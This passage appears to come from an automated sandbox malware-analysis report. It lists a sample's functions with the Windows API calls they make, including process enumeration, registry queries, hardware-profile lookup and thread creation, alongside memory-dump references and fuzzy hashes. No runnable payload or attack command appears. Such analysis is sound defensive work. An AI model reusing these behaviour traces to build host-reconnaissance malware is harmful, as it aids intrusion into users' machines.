                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$Eventlstrcpy$CloseHandleHeapOpenProcess$AllocateCreateExitNameUserlstrcatlstrlen
                                      • String ID:
                                      • API String ID: 2011554057-0
                                      • Opcode ID: 78da06d6b3c15353770fceffe6c36811e05dd3915249024c82d0ee1329cf05a2
                                      • Instruction ID: b01480e1d5a3b2a30415150ec120fccf19eedf600f73190197d21db62ab44534
                                      • Opcode Fuzzy Hash: 78da06d6b3c15353770fceffe6c36811e05dd3915249024c82d0ee1329cf05a2
                                      • Instruction Fuzzy Hash: EE213E3192010D7AEB55FBB0DD56FFEB378AF10780F104134F606A22D1EF606A298A65
                                      Function 00309FE0 Relevance: 7.6, APIs: 5, Instructions: 134fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,00000030,?,0030B1A9,?,?,?,00000000), ref: 0030A035
                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,0030B1A9,00000080,00000000,00000000,00000030,?,0030B1A9,?,?,?,00000000), ref: 0030A06F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CreatePointer
                                      • String ID:
                                      • API String ID: 2024441833-0
                                      • Opcode ID: 6994ff328faf46316447ee684204941a1a717e3a3690d9847ab584b72a5c4d8b
                                      • Instruction ID: 7c01931178a678d3ab5cf0c720e203bc471502c84125acdf46ed8682b23283b0
                                      • Opcode Fuzzy Hash: 6994ff328faf46316447ee684204941a1a717e3a3690d9847ab584b72a5c4d8b
                                      • Instruction Fuzzy Hash: 904174B2505B089FE7359F29B8C0B67B7DCE754324F108A2FF199C6580D275D8948B61
                                      Function 00300630 Relevance: 7.6, APIs: 5, Instructions: 82commemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CoCreateInstance.COMBASE(00314770,00000000,00000001,003138C4,?), ref: 0030066D
                                      • SysAllocString.OLEAUT32(?), ref: 0030067B
                                      • _wtoi64.MSVCRT ref: 003006BA
                                      • SysFreeString.OLEAUT32(?), ref: 003006D9
                                      • SysFreeString.OLEAUT32(00000000), ref: 003006E0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: String$Free$AllocCreateInstance_wtoi64
                                      • String ID:
                                      • API String ID: 1817501562-0
                                      • Opcode ID: 1f1c1f47e09e2ba4bacd17db0a02b293f3032debb3e8841e2ce655a1054812dc
                                      • Instruction ID: dffc781b1e1381e9993b8d403b06ef8a05dfcfed52c2d216aebaf34f5d5abb9d
                                      • Opcode Fuzzy Hash: 1f1c1f47e09e2ba4bacd17db0a02b293f3032debb3e8841e2ce655a1054812dc
                                      • Instruction Fuzzy Hash: 89219EB5A01249AFC705DF98CC91AEEBBB9EB8D310F108169F515EB250C7359941CBA0
                                      Function 00300200 Relevance: 7.6, APIs: 5, Instructions: 61processCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,003101E9), ref: 00300228
                                      • Process32First.KERNEL32(00000000,00000128), ref: 00300238
                                      • Process32Next.KERNEL32(00000000,00000128), ref: 0030024A
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                      • Process32Next.KERNEL32(00000000,00000128), ref: 0030029E
                                      • CloseHandle.KERNEL32(00000000), ref: 003002A9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process32lstrcpy$Next$CloseCreateFirstHandleSnapshotToolhelp32lstrcatlstrlen
                                      • String ID:
                                      • API String ID: 562399079-0
                                      • Opcode ID: 896834f72294b8427d92ada325640f07dab2b3fd2499974e823d3cb5beae56c8
                                      • Instruction ID: 0c71c400073286594bff762f180c5467cba0b5d530ed5d15bd56381d90e2aa80
                                      • Opcode Fuzzy Hash: 896834f72294b8427d92ada325640f07dab2b3fd2499974e823d3cb5beae56c8
                                      • Instruction Fuzzy Hash: 8A11E7316101186FEB56AB51DC1AFFEB37CAF89B40F000178F605E2190DF745A168FA5
                                      Function 002FFD30 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002FFD45
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 002FFD4C
                                      • RegOpenKeyExA.KERNEL32(80000002,02F357B8,00000000,00020119,?), ref: 002FFD6B
                                      • RegQueryValueExA.KERNEL32(?,02F45660,00000000,00000000,00000000,000000FF), ref: 002FFD86
                                      • RegCloseKey.ADVAPI32(?), ref: 002FFD90
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3225020163-0
                                      • Opcode ID: 5e9b28a626cca69679404ca6a21ecc016a0cce4581df0893c3ac91f925504ccc
                                      • Instruction ID: c8ffe3fc21020cb50038f271381fe8640ca3f2bce262177da45d610c8d05d773
                                      • Opcode Fuzzy Hash: 5e9b28a626cca69679404ca6a21ecc016a0cce4581df0893c3ac91f925504ccc
                                      • Instruction Fuzzy Hash: 58F04F75600208BBE720ABA0EC49FBB7B7CEF59755F004158FA05D2240D7706905A7A0
                                      Function 003042A0 Relevance: 4.6, APIs: 3, Instructions: 100sleepsynchronizationthreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNEL32(000003E8,?,?,?,?,?), ref: 00304345
                                      • CreateThread.KERNEL32(00000000,00000000,Function_000130F0,?,00000000,00000000), ref: 0030438D
                                      • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00304399
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateObjectSingleSleepThreadWait
                                      • String ID:
                                      • API String ID: 4198075804-0
                                      • Opcode ID: 2c7e0674b420fb3953f61cbd32ca7f7e6b9e6607104c25088c55218224568afd
                                      • Instruction ID: ad24916b223e0b588bea58e9c92d8b4d68da329afeb0fd84bc621b6c35f2ee2b
                                      • Opcode Fuzzy Hash: 2c7e0674b420fb3953f61cbd32ca7f7e6b9e6607104c25088c55218224568afd
                                      • Instruction Fuzzy Hash: B5417F7192020C9BDB65EFA0DE66BEDB778AF14780F504138FA02662D1DF706A59CF50
                                      Function 00301090 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenProcess.KERNEL32(00000410,00000000,?), ref: 003010A5
                                      • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 003010C0
                                      • CloseHandle.KERNEL32(00000000), ref: 003010C7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseFileHandleModuleNameOpenProcess
                                      • String ID:
                                      • API String ID: 3183270410-0
                                      • Opcode ID: 045ab6a78770c212c1fe920a2e53bc84087bbde2528870cf1924c7d05e92126d
                                      • Instruction ID: 573189dd2e1576da2bddfac8f49e58ef6d1ebc5a1328cb08137045cb595115cc
                                      • Opcode Fuzzy Hash: 045ab6a78770c212c1fe920a2e53bc84087bbde2528870cf1924c7d05e92126d
                                      • Instruction Fuzzy Hash: B1F065726016286BE631AB589C49FEE776CDF15B50F004150FF08A7290DBB06D898BD5
                                      Function 003003E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentHwProfileA.ADVAPI32(?), ref: 003003EB
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CurrentProfilelstrcpy
                                      • String ID: Unknown
                                      • API String ID: 2831436455-1654365787
                                      • Opcode ID: e0d5e82633c5be133f010b34fcbd1432039f0adadc28471378ea8e8ec240f52a
                                      • Instruction ID: 6514ee30aff477cdb0eb3ec2dfe7362fe71735645ab0572e0151b25addab8573
                                      • Opcode Fuzzy Hash: e0d5e82633c5be133f010b34fcbd1432039f0adadc28471378ea8e8ec240f52a
                                      • Instruction Fuzzy Hash: A5E08622F1412C535E15BBA87D018EEB76CCB4CB91B00426AFE09D3341DA6199218BD5
                                      Function 00300D50 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                      Download Yara Rule
                                      APIs
                                      • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00300D81
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
